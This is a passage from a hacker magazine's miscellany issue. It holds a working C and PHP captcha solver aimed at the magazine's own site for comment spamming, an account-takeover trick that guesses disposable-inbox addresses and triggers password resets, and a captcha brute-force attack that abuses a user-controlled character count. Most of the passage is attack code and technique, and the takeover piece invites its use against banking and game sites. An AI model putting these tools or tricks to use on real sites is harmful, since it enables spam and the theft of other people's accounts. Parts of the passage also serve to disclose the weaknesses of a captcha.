resurrect it. After all, "a strong linenoise is key" ;-)

So, dear hacker, enjoy a strong Linenoise.


--[ Contents

    1 - Spamming PHRACK for fun and profit                 -- darkjoker
    2 - The Dangers of Anonymous Email                     -- DangerMouse
    3 - Captchas Round 2                                   -- PHRACK PHP
                                                              CoderZ Team
    4 - XSS Using NBNS on a Home Router                    -- Simon Weber
    5 - Hacking the Second Life Viewer For Fun and Profit  -- Eva
    6 - How I misunderstood digital radio                  -- M.Laphroaig
    7 - The 1130 Guide to Growing High-Quality Cannabis    -- 1130


|=[ 0x01 ]=---=[ Spamming PHRACK for fun & profit - darkjoker ]=---------=|

In this paper I'd like to explain how a captcha can be bypassed without
problems with just a few lines of C.  First of all we'll pick a captcha to
bypass, and, of course, is there any better captcha than the one of this
site?  Of course not, so we'll take it as example.  You may have noticed
that there are many different spam messages in the comments of the
articles, which means that probably someone else has already bypassed the
captcha but, instead of writing an article about it, decided to spend his
time posting spam all around the site.  Well, I hope that this article will
also be taken into account to make the decision to change captcha, because
this one is really weak.

First of all we're going to download some captchas, so that we'll be able
to teach our bot how to recognise a random captcha.  In order to download
some captchas i've written this PHP code:

<?php
mkdir ("images");
for ($i=0;$i<200;$i++)
   file_put_contents ("images/{$i}.jpg",file_get_contents
                  ("http://www.phrack.com/captcha.php"));
?>

We're downloading 200 captchas, which should be enought.  Ok, once we'll
have downloaded all the images we can proceed, cleaning the images (which
means we're going to remove the "noise".  In these captchas the noise is
just made of some pixel of a lighter blue than the one used to draw the
letters.  Well, it's kind of a mess to work with JPEG images, so we'll
convert all the images in PPM, which will make our work easier.

Luckily under Linux there's a command which makes the conversion really
easy and we won't need to do it manually:

convert -compress None input.jpg output.ppm

Let's do it for every image we have:

<?php
mkdir ("ppm");
for ($i=0;$i<200;$i++)
   system ("convert -compress None images/{$i}.jpg ppm/{$i}.ppm");
?>

Perfect, now we have everything we need to proceed.  Now, as I said
earlier, we've to remove the noise.  That's a function which will load an
image and then removes the noise:

void load_image (int v) {
   char img[32],line[1024];
   int n,i,d,k,l,s;
   FILE *fp;
   sprintf (img, "ppm/%d.ppm",v);
   fp = fopen (img, "r");
   do
      fgets (line, sizeof(line),fp);
   while (strcmp (line, "255\n"));
   i=0;
   d=0;
   k=0;
   int cnt=0;
   while (i!=40) {
      fscanf (fp,"%d",&n);
      captcha[i][d][k]=(char)n;
      k++;
      if (k==3) {
         k=0;
         if (d<119)
            d++;
         else {
            i++;
            d=0;
         }
      }
   }
}

Ok, this piece of code will load an image into 'captcha', which is a 3
dimensional array (rows*cols*3 bytes per color).  Once the array is loaded,
using clear_noise () (written below) the noise will be removed.

void clear_noise () {
   int i,d,k,t,ti,td;
   char n[3];
   /* The borders are always white */
   for (i=0;i<40;i++)
      for (k=0;k<3;k++) {
         captcha[i][0][k]=255;
         captcha[i][119][k]=255;
      }
   for (d=0;d<120;d++)
      for (k=0;k<3;k++) {
         captcha[0][d][k]=255;
         captcha[39][d][k]=255;
      }
   /* Starts removing the noise */
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
             captcha[i][d][2]>__COL)
            for (k=0;k<3;k++)
               captcha[i][d][k]=255;
   for (i=1;i<39;i++) {
      for (d=1;d<119;d++) {
         for (k=0,t=0;k<3;k++)
            if (captcha[i][d][k]!=255)
               t=1;
         if (t) {
            ti=i-1;
            td=d-1;
            for (k=0,t=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td+=2;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i+1;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            if (t/3<=__MIN)
               for (k=0;k<3;k++)
                  captcha[i][d][k]=255;
         }
      }
   }
}

Well, what does this function do? It's really easy, first of all it clears
all the borders (because we know by looking at the downloaded images that
the borders never contain any character).  Once the borders are cleaned,
the second part of the routine will remove all the light blue pixels,
turning them into white pixels.  This way we'll obtain an almost perfect
image.  The only issue is that there are some pixels which are as dark as
the ones which composes the characters, so we can't remove them with the
method explained above, we'll have to create something new.  My idea was to
"delete" all the pixels which have no blue pixels near them, so that the
few blue pixels which doesn't compose the letters will be deleted.  In
order to make the image cleaner I decided to delete all the pixels which
doesn't have at least 3 pixels near them.  You may have noticed that __COL
and __MIN are not defined in the source above, these are two numbers:

#define   __COL   0x50
#define   __MIN   4*3

__COL is a number I used when I delete all the light blue pixels, I use it
in this line:

if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
    captcha[i][d][2]>__COL)

In a few words, if the pixel is lighter than #505050 then it will be
deleted (turned white). __MIN is the minimum number of conterminous pixels
under which the pixel is deleted.  The values where obtained after a few
attempts.

Perfect, now we have a piece of code which loads and clears a captcha.  Our
next goal is to split the characters so that we'll be able to recognise
each of them. Before doing all this work we'd better start working with 2
dimensional arrays, it'll make our work easier, so I've written some lines
which makes this happen:

void make_bw () {
   int i,d;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]!=255)
            bw[i][d]=1;
         else
            bw[i][d]=0;
}

This simply transforms the image in a black and white one, so that we can
use a 2 dimensional array.  Now we can proceed splitting the letters.
In order to get the letters divided we are supposed to obtain two pixels
whose coordinates are the ones of the upper left corner and the lower right
corner. Once we have the coordinates of these two corners we'll be able to
cut a rectangle which contains a character.

Well, we're going to begin scanning the image from the left to the right,
column by column, and every time we'll find a black pixels in a column
which is preceded by an entire-white column, we'll know that in that column
a new character begins, while when we'll find an entire-white column
preceded by a column which contains at least one black pixel we'll know
that a character ends there.

Now, after this procedure is done we should have 12 different numbers which
represents the columns where each character begins and ends.  The next step
is to find the rows where the letter begins and ends, so that we can obtain
the coordinates of the pixels we need.  Let's call the column where the Xth
character begins CbX and the column where the Xth character ends CeX.  Now
we'll start our scan from the top to the bottom of the image to find the
upper coordinate and from the bottom to the top to find the lower
coordinate.

This time, of course, the scan will be done six times using as limits the
columns where each character is contained between.

When the first row which contains a pixel is found (let's call this row
RbX) the same thing will be done to find the lower coordinate. The only
difference will be that the scan will begin from the bottom, that's done
this way because some characters (such as the 'j') are divided into two
parts, and if the scan was done only from the bottom to the end the result
would have been just a dot instead of the whole letter.

After having scanned the image from the bottom to the top we'll have
another row where the letter ends (or begins from the bottom), we'll call
this row ReX (of course we're talking about the Xth character).

Now we know which are the horizontal and vertical coordinates of the two
corners we're interested in (which are C1X(CbX,RbX) and C2X(CeX,ReX)), so
we can procede by filling a (CeX-CbX)*(ReX-RbX) matrix which will contain
the Xth character. Obviously the matrix will be filled with the bits of the
Xth character.

void scan () {
   int i,d,k,j,c,coord[6][2][2];
   for (d=0,j=0,c=0;d<120;d++) {
      for (i=0,k=0;i<40;i++)
         if (bw[i][d])
            k=1;
      if (k && !j) {
         j=1;
         coord[c][0][0]=d;
      }
      else if (!k && j) {
         j=0;
         coord[c++][0][1]=d;
      }
   }
   for (c=0;c<6;c++) {
      coord[c][1][0]=-1;
      coord[c][1][1]=-1;
      for (i=0;(i<40 && coord[c][1][0]==-1);i++)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][0]=i;
               break;
            }
      for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][1]=i;
               break;
            }
      for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
         for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
            chars[c][j][k]=bw[i][d];
      dim[c][0]=j;
      dim[c][1]=k;
   }
}

Ok, now, using this function we're going to obtain all the characters
splitted into an array of 2 dimension arrays.  The next step will be the
most boring, because we're going to divide all the characters by hand, so
that the program, after our work, will be able to recognise all of them and
learn how each character is made.  Before that, we need a new directory
which will contain all the characters.  A simple 'mkdir chars' will do.
Now we have to fill the directory with the characters.  Here's a main
function whose goal is to divide all the captchas into characters and put
them in the chars/ directory.

int main () {
   int i,d,k,c,n;
   FILE *x;
   char path[32];
   for (n=0,k=0;n<200;n++) {
      load_image (n);
      clear_noise ();
      make_bw ();
      scan ();
      for (c=0;c<6;c++,k++) {
         sprintf (path,"chars/%d.ppm",k);
         x=fopen (path,"w");
         fprintf (x,"P1\n#asdasd\n\n%d %d\n",dim[c][1],dim[c][0]);
         for (i=0;i<dim[c][0];i++) {
            for (d=0;d<dim[c][1];d++)
               fprintf (x,"%d",chars[c][i][d]);
            fprintf (x,"\n");
         }
         fclose (x);
      }
   }
   return 0;
}

Very well, now the chars/ directory contains all the files we need.  Now it
comes the part where the human is supposed to divide the characters in the
right directories.  To make this work faster I've used a simple PHP script
which helps a little:

<?php
$in=fopen ("php://stdin","r");
mkdir ("c");
for ($i=0;$i<26;$i++)
   mkdir ("c/".chr(ord('a')+$i));
for ($i=0;$i<10;$i++)
   mkdir ("c/".chr(ord('0')+$i));
for ($i=54;$i<1200;$i++) {
   echo $i.": ";
   $a = trim(fgets ($in,1024));
   if ($a!='.')
      system ("cp chars/{$i}.ppm c/{$a}/{$i}.ppm");
}
fclose ($in);
?>

I think there's nothing to be explained, it's just a few lines of code.
After the script is runned and someone (me) enters all the data needed
we're going to have a c/ directory with some subdirectories in which there
are all the characters divided.

Some characters ('a','e','i','o','u','l','0','1') never appear, which means
that probably the author of the captcha decided not to include these
characters.

Anyway that's not a problem for us.  Now, we should work out a way to make
our program recognise a character.  My idea was to divide the image in 4
parts (horizontally), and then count the number of black (1) pixels in each
part, so that when we have an unknown character all our program will be
supposed to do is to count the number of black pixels for each part of the
image, and then search the character with the closest number of black
pixels.  I've tried to do it but I haven't kept into account that some
characters (such as 'q' and 'p') have a similar number of pixels for each
part, even though they're completely different.

After having realised that, I decided to use 8 parts to divide each
character: 4 parts horizontally, then each part is divided in other 2 parts
vertically.

Well, of course there's no way I could have done that by hand, and in fact
I've written a PHP script:

<?php
error_reporting (E_ALL ^ E_NOTICE);
$f = array (4,2,4/3,1);
$arr=array ('b','c','d','f','g','h','j','k','m','n','p','q','r','s','t',
            'v','w','x','y','z','2','3','4','5','6','7','8','9');
$h = array ();
for ($a=0;$a<count($arr);$a++) {
   $i = $arr[$a];
   $x = array ();
   $files = scandir ("c/{$i}");
   for ($d=0;$d<count($files);$d++) {
      if ($files[$d][0]!='.') { // Excludes '.' and '..'
         $lines=explode ("\n",file_get_contents ("c/{$i}/{$files[$d]}"));
         for ($k=0;$k<4;$k++)
            array_shift ($lines);
         array_pop ($lines);
         $j = count ($lines);
         $k = strlen ($lines[0]);
         $r=0;
         $h[$a] += $j;
         if ($files[$d]=="985.ppm") {
         for ($n=0;$n<4;$n++)
            for (;$r<floor ($j/$f[$n]);$r++) {
               for ($l=0;$l<floor($k/2);$l++)
                  $x[$n][0]+=$lines[$r][$l];
               for (;$l<floor($k);$l++)
                  $x[$n][1]+=$lines[$r][$l];
            }
         print_r ($x);
         }
      }
   }
   $h [$a] = round ($h[$a]/(count($files)-2));
   for ($n=0;$n<4;$n++) {
      $x[$n][0] = round ($x[$n][0]/(count($files)-2));
      $x[$n][1] = round ($x[$n][1]/(count($files)-2));
   }
   printf ("$i => %02d %02d %02d %02d / %02d %02d %02d %02d\n",$x[0][0],
           $x[1][0],$x[2][0],$x[3][0],$x[0][1],$x[1][1],$x[2][1],$x[3][1]);
}
for ($i=0;$i<count ($arr);$i++)
   echo "{$h[$i]}, ";

?>

It works out the average number of black pixels for each part.  Moreover it
also prints the average height of each character (I'm going to explain the
reason of this below).

A character such as a 'z' is divided this way:

01111  111110
11111  111111
11111  111111
01111  111111

00000  111110
00000  111110
00000  111100
00001  111100

00001  111000
00011  110000
00011  110000
00111  100000

00111  111110
01111  111111
01111  111111
00111  111110

So the numbers (of the black pixels) in this case will be:

18 23
 1 18
 8  8
14 22

Well, once taken all these numbers from each character the PHP script
written above works out the average numbers for each character.  In the
'z', for example, the average numbers are:

18 20
 3 15
11  7
17 20

Which are really close to the ones written above (at least, they're closer
than the ones of the other characters).  Now the last step is to do the
comparison between the character of the captcha we want our program to read
and the numbers we've stored.  To do so we first need to make the program
count the number of black pixels of a character, and save the numbers
somewhere so that it'll be possible to do the comparison.  read_pixels ()'s
aim is exactly to do that, using the same method used above in the PHP
script.

void read_pixels (int c) {
   int i,d,k,r;
   float arr[]={4,2,1.333333,1};
   memset (bpix,0,8*sizeof(int));
   for (k=0,i=0;k<4;k++) {
      for (;i<(int)(dim[c][0]/arr[k]);i++) {
         for (d=0;d<dim[c][1]/2;d++)
            bpix[k][0] += chars[c][i][d];
         for (;d<dim[c][1];d++)
            bpix[k][1] += chars[c][i][d];
      }
   }
}

The next step is to compare the numbers, that's what the cmp () function is
supposed to do:

char cmp (int c) {
   int i,d;
   int err,n,min,min_i;
   read_pixels (c);
   for (i=0,min=-1;i<28;i++) {
      n=abs(heights[i]-dim[c][0])*__HGT;
      for (d=0;d<4;d++) {
         n += abs(bpix[d][0]-table[i][0][d]);
         n += abs(bpix[d][1]-table[i][1][d]);
      }
      if (min>n || min<0) {
         min=n;
         min_i = i;
      }
   }
   return ch_list[min_i];
}

'table' is an array in which all the average numbers worked out before are
stored.  As you can see there's a final number (n) which is the sum of a
number obtain in this way:

n += |x-y)

Where 'x' is the number of black pixels of each part of the character we
want to read, while 'y' is the average number of the character we're
comparing the character we want to read with.  The smaller the resulting
number is, the closer to that character.  I firstly thought that the
algorithm I used would have been good enough, but I soon realised that
there were too many "misunderstandings" while the program was trying to
read some characters (such as the 'y's, which were usually read as 'v's).
So I decided to make the final number also influenced by the height of the
character, so that a 'v' and a 'y' (which have different heights) can't be
misunderstood.

Before this change the program couldn't recognise 17 characters out of
1200.  Then, after some tests, I found that by adding the difference of the
heights times a costant, the results were better: 3 wrong characters out of
1200.

n = |x-y|*k

Where 'x' is the height of the character we want to read while 'y' is the
height of the character we're comparing the character we want to read
with.

The costant (k) was calculated by doing some attempts, and finally it was
given the value 1.5.  Now everything's ready, the last function I've
written is read_captcha () which will return the captcha's string.

char *read_captcha (char *file) {
   char *str;
   int i;
   str = malloc(7*sizeof(char));
   load_image (file);
   clear_noise ();
   make_bw ();
   scan ();
   for (i=0;i<6;i++)
      str[i]=cmp(i);
   str[i]=0;
   return str;
}

And.. Done :) Now we can make our program read a captcha without any
problem.  Now I should be supposed to code an entire spam bot, but, since
it requires some tests I think it wouldn't be good to post random comments
all around phrack, so my article finishes here.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define   __COL   80
#define   __MIN   4*3
#define   __HGT   1.5

unsigned char captcha[40][120][3];
unsigned char bw[40][120];
unsigned char chars[6][40][30];
int dim[6][2];
int bpix[4][2];
int heights[] = {
      23, 16, 23, 23, 22, 23, 29,
      23, 16, 16, 22, 22, 16, 16,
      20, 16, 16, 16, 21, 16, 23,
      24, 23, 23, 23, 23, 24, 24 };
char ch_list [] = "bcdfghjkmnpqrstvwxyz23456789";
int table [28][2][4]= {
         { {18, 28, 26, 28}, { 0, 20, 25, 29}},
         { {10, 17, 17, 10}, {21,  1,  1, 20}},
         { { 0, 20, 25, 29}, {18, 31, 26, 31}},
         { {10, 24, 18, 17}, {23, 12,  6,  5}},
         { {21, 25, 20,  8}, {28, 25, 29, 27}},
         { {18, 28, 25, 22}, { 0, 20, 25, 22}},
         { { 1,  9,  0, 14}, {13, 27, 28, 25}},
         { {18, 24, 30, 22}, { 0, 15, 21, 23}},
         { {24, 21, 20, 17}, {21, 25, 24, 20}},
         { {17, 18, 16, 14}, {20, 17, 16, 14}},
         { {27, 25, 29, 22}, {24, 25, 25,  0}},
         { {25, 25, 24,  0}, {27, 25, 29, 22}},
         { {14, 16, 15, 13}, {19,  2,  0,  0}},
         { {15, 16,  2,  9}, {12,  4, 18, 17}},
         { {15, 20, 15, 12}, { 5, 10,  5, 19}},
         { {13, 17, 15, 11}, {14, 14, 14, 10}},
         { { 9, 17, 20, 13}, {12, 18, 22, 14}},
         { { 9, 11, 11, 13}, {12, 13, 13, 12}},
         { {15, 19, 14, 14}, {16, 20, 15,  9}},
         { {18,  3, 11, 17}, {20, 15,  7, 20}},
         { {21,  4,  8, 24}, {21, 26, 19, 24}},
         { {16,  0,  6, 24}, {29, 23, 25, 28}},
         { { 5, 12, 23,  5}, {23, 24, 32, 24}},
         { {23, 25, 10, 20}, {18, 12, 26, 23}},
         { { 3, 21, 28, 24}, {16, 15, 30, 27}},
         { {18,  1, 11, 20}, {27, 24, 14,  3}},
         { {25, 24, 26, 23}, {28, 26, 28, 28}},
         { {20, 27, 16, 16}, {25, 26, 28,  9}} };

void clear () {
   int i,d,k;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         for (k=0;k<3;k++)
            captcha[i][d][k]=0;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         bw[i][d]=0;
   for (i=0;i<6;i++)
      for (d=0;d<40;d++)
         for (k=0;k<30;k++)
            chars[i][d][k]=0;
   for (i=0;i<6;i++)
      for (d=0;d<2;d++)
         dim[i][d]=0;
}

int numlen (int n) {
   char x[16];
   sprintf (x,"%d",n);
   return strlen(x);
}

void load_image (char *img) {
   char line[1024];
   int n,i,d,k,l,s;
   FILE *fp;
   fp = fopen (img, "r");
   do
      fgets (line, sizeof(line),fp);
   while (strcmp (line, "255\n"));
   i=0;
   d=0;
   k=0;
   int cnt=0;
   while (i!=40) {
      fscanf (fp,"%d",&n);
      captcha[i][d][k]=(char)n;
      k++;
      if (k==3) {
         k=0;
         if (d<119)
            d++;
         else {
            i++;
            d=0;
         }
      }
   }
}

void clear_noise () {
   int i,d,k,t,ti,td;
   char n[3];
   /* The borders are always white */
   for (i=0;i<40;i++)
      for (k=0;k<3;k++) {
         captcha[i][0][k]=255;
         captcha[i][119][k]=255;
      }
   for (d=0;d<120;d++)
      for (k=0;k<3;k++) {
         captcha[0][d][k]=255;
         captcha[39][d][k]=255;
      }
   /* Starts removing the noise */
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
             captcha[i][d][2]>__COL)
            for (k=0;k<3;k++)
               captcha[i][d][k]=255;
   for (i=1;i<39;i++) {
      for (d=1;d<119;d++) {
         for (k=0,t=0;k<3;k++)
            if (captcha[i][d][k]!=255)
               t=1;
         if (t) {
            ti=i-1;
            td=d-1;
            for (k=0,t=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td+=2;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i+1;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            if (t<__MIN)
               for (k=0;k<3;k++)
                  captcha[i][d][k]=255;
         }
      }
   }
}

void make_bw () {
   int i,d;
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]!=255)
            bw[i][d]=1;
         else
            bw[i][d]=0;
}

void scan () {
   int i,d,k,j,c,coord[6][2][2];
   for (d=0,j=0,c=0;d<120;d++) {
      for (i=0,k=0;i<40;i++)
         if (bw[i][d])
            k=1;
      if (k && !j) {
         j=1;
         coord[c][0][0]=d;
      }
      else if (!k && j) {
         j=0;
         coord[c++][0][1]=d;
      }
   }
   for (c=0;c<6;c++) {
      coord[c][1][0]=-1;
      coord[c][1][1]=-1;
      for (i=0;(i<40 && coord[c][1][0]==-1);i++)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][0]=i;
               break;
            }
      for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
         for (d=coord[c][0][0];d<coord[c][0][1];d++)
            if (bw[i][d]) {
               coord[c][1][1]=i;
               break;
            }
      for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
         for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
            chars[c][j][k]=bw[i][d];
      dim[c][0]=j;
      dim[c][1]=k;
   }
}

void read_pixels (int c) {
   int i,d,k,r;
   float arr[]={4,2,1.333333,1};
   memset (bpix,0,8*sizeof(int));
   for (k=0,i=0;k<4;k++) {
      for (;i<(int)(dim[c][0]/arr[k]);i++) {
         for (d=0;d<(int)(dim[c][1]/2);d++)
            bpix[k][0] += chars[c][i][d];
         for (;d<dim[c][1];d++)
            bpix[k][1] += chars[c][i][d];
      }
   }
}

char cmp (int c) {
   int i,d;
   int err,n,min,min_i;
   read_pixels (c);
   for (i=0,min=-1;i<28;i++) {
      n=abs(heights[i]-dim[c][0])*__HGT;
      for (d=0;d<4;d++) {
         n += abs(bpix[d][0]-table[i][0][d]);
         n += abs(bpix[d][1]-table[i][1][d]);
      }
      if (min>n || min<0) {
         min=n;
         min_i = i;
      }
   }
   return ch_list[min_i];
}

char *read_captcha (char *file) {
   char *str;
   int i;
   str = malloc(7*sizeof(char));
   load_image (file);
   clear_noise ();
   make_bw ();
   scan ();
   for (i=0;i<6;i++)
      str[i]=cmp(i);
   str[i]=0;
   return str;
}

int main (int argc, char *argv[]) {
   printf ("%s\n",read_captcha ("test.ppm"));
   return 0;
}

Oh, if you want to have some fun and the staff is so kind as to leave
captcha.php (now captcha_old.php) you can run this PHP script:

<?
file_put_contents ("a.jpg",file_get_contents
   ("http://www.phrack.com/captcha_old.php"));
system ("convert -compress None a.jpg test.ppm");
system ("./captcha");
?>

I'm done, thanks for reading :)!

               darkjoker - darkjoker93 _at_ gmail.com


|=[ 0x02 ]=---=[ The Dangers of Anonymous Email - DangerMouse ]=---------=|


In this digital world of online banking, and cyber relationships there
exists an epidemic. This is known simply as SPAM.
The war on spam has been costly, with casualties on both sides. However
finally mankind has developed the ultimate weapon to win the war...
email anonymizers!

Ok, so maybe this was a bit dramatic, but the truth is people are
getting desperate to rid themselves of the gigantic volumes of
unsolicited email which plagues their inbox daily. To combat this problem
many internet users are turning to email anonymizing services such as
Mailinator [1].

Sites like mailinator.com provide a domain where any keyword can be
created and appended as the username portion of an email address.
So for example, if you were to choose the username "trustno1", the email
address trustno1@mailinator.com could be used. Then the mailbox can be
accessed without a password at http://trustno1.mailinator.com. There is
no registration required to do this, and the email address can be created
at a whim. Obviously this can be used for a number of things. From a
hackers perspective, it can be very useful to quickly create an anonymous
email address whenever one is needed. Especially one which can be checked
easily via a chain of proxies. Hell, combine it with an anonymous visa
gift card, and you've practically got a new identity.

For your typical spam adverse user, this can be an easy way to avoid
dealing with spam. One of the easiest ways to quickly gain an inbox
soaked in spam is to use your real email address to sign up to every
shiney new website which tickles your fancy. By creating a mailinator
account and submitting that instead, the user can visit the mailinator
website to retrieve the sign up email. Since this is not the users
regular email account, any spam sent to it is inconsequential.

The flaw with this however, is that your typical user just isn't
creative enough to work with a system designed this way. When creating
a fresh anonymous email account for a new website a typical users
thought process goes something like this:

a) Look up at URL for name of site
b) Append said name to mailinator domain
c) ???
d) Profit

This opens up a nice way for the internet's more shady characters to
quickly gain access to almost any popular website via the commonly
implemented "password reset" functionality.

But wait, you say. Surely you jest? No one could be capable of such
silly behavior on the internet!

Alas... Apparenly Mike & Debra could.

"An email with instructions on how to access Your Account has been sent to
you at netflix@mailinator.com"

"Netflix password request

"Dear Mike & Debra,
We understand you'd like to change your password. Just click here and
follow the prompts. And don't forget your password is case sensitive."

;) ?

At least security folk would be immune to this you say! There's no way
that gmail@mailinator.com would allow one to reset 2600LA's mailing list
password...

As you can imagine it's easy to wile away some time with possible
targets ranging from popular MMO's to banking websites. Just make sure
you use a proxy so you don't have to phone them up and give them their
password back... *cough*

Have fun! ;)

                       --DangerMouse <Phrack@mailinator.com>

P.S. With the rise in the popularity of social networking websites
mailinator felt the need to go all web 2.0 by including a fancy list of
people who "Like" mailinator on Facebook. AKA a handy target list for a
bored individual with scripting skillz.

References:
[1] Mailinator: http://www.mailinator.com
[2] Netflix: http://www.netflix.com


|=[ 0x03 ]=---=[ Captchas Round 2 - phpc0derZ@phrack.org ]=--------------=|

                     [ Or why we suck even more ;> ]

Let's face it, our lazyness got us ;-) So what's the story behind our
captcha? Ironically enough, the original script is coming from this URL:

http://www.white-hat-web-design.co.uk/articles/php-captcha.php <-- :)))))))

8<----------------------------------------------------------------------->8
<?php
session_start();

/*
* File: CaptchaSecurityImages.php
* Author: Simon Jarvis
* Copyright: 2006 Simon Jarvis
* Date: 03/08/06
* Updated: 07/02/07
* Requirements: PHP 4/5 with GD and FreeType libraries
* Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details:
* http://www.gnu.org/licenses/gpl.html
*
*/


class CaptchaSecurityImages {

   var $font = 'monofont.ttf';

   function generateCode($characters)
   {
      /* list all possible characters, similar looking characters and
       * vowels have been removed */
     $possible = '23456789bcdfghjkmnpqrstvwxyz'; $code = ''; $i = 0;
     while ($i < $characters) {
       $code .= substr($possible, mt_rand(0, strlen($possible)-1),1);
       $i++;
     }
     return $code;
   }

   function CaptchaSecurityImages(
        $width='120',
        $height='40',
        $characters='6')
   {
      $code = $this->generateCode($characters);
      /* font size will be 75% of the image height */
      $font_size = $height * 0.75;
      $image = imagecreate($width, $height)
      or die('Cannot initialize new GD image stream');
      /* set the colours */
      $background_color = imagecolorallocate($image, 255, 255, 255);
      $text_color = imagecolorallocate($image, 20, 40, 100);
      $noise_color = imagecolorallocate($image, 100, 120, 180);
      /* generate random dots in background */
      for( $i=0; $i<($width*$height)/3; $i++ ) {
         imagefilledellipse($image,
                            mt_rand(0,$width),
                            mt_rand(0,$height),
                            1,
                            1,
                            $noise_color);
      }
      /* generate random lines in background */
      for( $i=0; $i<($width*$height)/150; $i++ ) {
         imageline($image,
                   mt_rand(0,$width),
                   mt_rand(0,$height),
                   mt_rand(0,$width),
                   mt_rand(0,$height),
                   $noise_color);
      }
      /* create textbox and add text */
      $textbox = imagettfbbox($font_size,
                              0,
                              $this->font,
                              $code)
      or die('Error in imagettfbbox function');
      $x = ($width - $textbox[4])/2;
      $y = ($height - $textbox[5])/2;
      imagettftext($image,
                   $font_size,
                   0,
                   $x,
                   $y,
                   $text_color,
                   $this->font ,
                   $code)
      or die('Error in imagettftext function');
      /* output captcha image to browser */
      header('Content-Type: image/jpeg');
      imagejpeg($image);
      imagedestroy($image);
      $_SESSION['security_code'] = $code;
   }

}

$width = isset($_GET['width']) && $_GET['width']<600?$_GET['width']:'120';
$height = isset($_GET['height'])&&$_GET['height']<200?$_GET['height']:'40';
$characters = isset($_GET['characters'])
&& $_GET['characters']>2?$_GET['characters']:'6';

$captcha = new CaptchaSecurityImages($width,$height,$characters);

?>
8<----------------------------------------------------------------------->8

The reason why this particular script was chosen was lost in the mist of
time so let's focus instead on the code:

----[ 1 - Oops

OK so darkangel was right, the script is *really* poorly designed:
    -> The set of possible characters is limited to 28 characters
    -> The characters are inserted in the image using imagettfbbox()
           with (amongst other things) a fixed $font_size, a predictable
           position, etc.
    -> The noise itself is generated using lines and circles of the
       same color ($noise_color) which makes it trivial to remove.

Ok so we knew that it was crappy but there is even more. darkjoker's
approach can be seen as a dictionnary attack applied when the noise has
been removed. There is much more simple: since the characters are not
distorded, we can easily recover them using an OCR software. Luckily there
exists a GNU one: gocr. We tested it against the imagettfbbox() function
and without surprise ... it worked.

Hey man, it wasn't worth to spend that much time :>

----[ 2 - Oops (bis)

We located two interested things in the script and if you're a proficient
PHP reader then you've probably noticed them too... ;-)

    a) The number of characters inserted in the image is user controlled.
       If an attacker calls http://phrack.org/captcha.php?characters=x then
       he can generate a captcha with X characters ( x >= 2 ). This
       shouldn't be an issue itself since captcha.php is called by the
       server. However it is because...

    b) The script includes an interesting line:
            $_SESSION['security_code'] = $code;
       This clearly means that the PHP session will only keep track of
       the *last* $code. While this is a normal behavior (some captcha
       aren't readable at all so the user must be allowed to refresh),
       this will be at our advantage.

This gives us the opportunity to mount a new attack:
    -> I'm a spam bot and I'm writing some shit comment about how big &
       hard your penis will be when you will purchase my special pills. A
       PHP session is created.
    -> A captcha is loaded and because I'm a bot I can't fucking read it.
       Too bad for me.
    -> Within the same session I call captcha.php with ?characters=2.
       With a probability of 1/(28*28) I will be able to predict the
       code generated. I'll try as many times as required until I'm right.
    -> I will most likely succeed in the end and some poor desperate guy
       may purchase the pills.

We've changed the captcha mechanism, the old one being captcha_old.php

----[ 3 - Conclusion

Who knows if spammers are reading phrack? One thing is sure: the script is
very present on Internet... Yes you should patch xD


|=[ 0x04 ]=---=[ XSS Using NBNS on a Home Router - Simon Weber ]=--------=|


--[ code is appended, but may not be the most recent. check:
